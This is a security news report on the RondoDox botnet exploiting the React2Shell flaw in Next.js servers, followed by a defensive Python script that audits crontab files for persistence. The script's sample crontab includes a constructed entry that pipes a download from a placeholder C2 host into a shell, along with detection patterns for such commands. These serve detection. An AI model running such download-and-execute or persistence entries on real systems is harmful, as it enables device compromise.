RondoDox botnet exploits React2Shell flaw to breach Next.js servers

The RondoDox botnet has been observed exploiting the critical React2Shell flaw (CVE-2025-55182) to infect vulnerable Next.js servers with malware and cryptominers.

First documented by Fortinet in July 2025, RondoDox is a large-scale botnet that targets multiple n-day flaws in worldwide attacks. In November, VulnCheck observed new RondoDox variants that featured exploits for CVE-2025-24893, a critical remote code execution (RCE) vulnerability in the XWiki Platform.

A new report from cybersecurity firm CloudSEK notes that RondoDox began scanning for vulnerable Next.js servers on December 8 and started deploying botnet clients three days later.


React2Shell is an unauthenticated remote code execution vulnerability that can be exploited via a single HTTP request and affects all frameworks that implement the React Server Components (RSC) 'Flight' protocol, including Next.js.

The flaw has been leveraged by multiple threat actors to breach several organizations. North Korean hackers exploited React2Shell to deploy a new malware family named EtherRAT.

As of December 30, the Shadowserver Foundation reports detecting over 94,000 internet-exposed assets vulnerable to React2Shell.

CloudSEK says that RondoDox has passed through three distinct operational phases this year:

  • Reconnaissance and vulnerability testing from March to April 2025
  • Automated web app exploitation from April to June 2025
  • Large-scale IoT botnet deployment from July to today

Regarding React2Shell, the researchers report that RondoDox has recently concentrated its exploitation on this flaw, launching over 40 exploit attempts within six days in December.

During this operational phase, the botnet conducts hourly IoT exploitation waves targeting Linksys, Wavlink, and other consumer and enterprise routers to enroll new bots.

After probing potentially vulnerable servers, CloudSEK says that RondoDox began to deploy payloads that included a coinminer (/nuts/poop), a botnet loader and health checker (/nuts/bolts), and a variant of Mirai (/nuts/x86).

The 'bolts' component removes competing botnet malware from the host, enforces persistence via /etc/crontab, and kills non-whitelisted processes every 45 seconds, the researchers say.

CloudSEK provides a set of recommendations for companies to protect against this RondoDox activity, among them auditing and patching Next.js Server Actions, isolating IoT devices into dedicated virtual LANs, and monitoring for suspicious processes being executed.
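As an added defender-side illustration (not code from CloudSEK or this article), the script below audits a system crontab in /etc/crontab format for the persistence behaviour described above: entries that reference the payload paths named in the report, run from world-writable directories, or pipe a download straight into a shell. The sample crontab, the placeholder C2 host and the directory heuristic are constructed for this example; that the payload paths appear verbatim in a cron command is an assumption.

```python
import re

# Payload paths named in the CloudSEK report (from the article); that they show up
# verbatim inside a cron command is an assumption of this example.
KNOWN_PAYLOAD_PATHS = ("/nuts/poop", "/nuts/bolts", "/nuts/x86")
# World-writable locations that legitimate system cron entries rarely run from (heuristic).
SUSPICIOUS_DIRS = ("/tmp/", "/dev/shm/", "/var/tmp/")

# System crontab format: five schedule fields (or an @keyword), a user, then the command.
CRON_LINE = re.compile(
    r"^(?P<schedule>@\w+|\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$"
)

def audit_crontab(text):
    """Return (line_no, user, command, reasons) for each entry worth a closer look."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        m = CRON_LINE.match(line)
        if not m:
            continue
        cmd = m.group("cmd")
        reasons = []
        for path in KNOWN_PAYLOAD_PATHS:
            if path in cmd:
                reasons.append(f"references known RondoDox payload path {path}")
        for d in SUSPICIOUS_DIRS:
            if d in cmd:
                reasons.append(f"executes from world-writable directory {d}")
        if re.search(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b", cmd):
            reasons.append("pipes a download straight into a shell")
        if reasons:
            findings.append((line_no, m.group("user"), cmd, reasons))
    return findings

# Constructed sample crontab: two benign lines plus two entries modelled on the
# persistence behaviour described above (the C2 host is a placeholder, not a real IoC).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
@reboot root /tmp/.x/bolts
*/1 * * * * root curl -s http://C2-PLACEHOLDER/nuts/bolts | sh
"""

if __name__ == "__main__":
    for line_no, user, cmd, reasons in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {line_no} ({user}): {cmd}\n    " + "\n    ".join(reasons))
```

Run it against the contents of /etc/crontab (and the files under /etc/cron.d) on a host you suspect; only the two constructed malicious entries are flagged in the sample.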
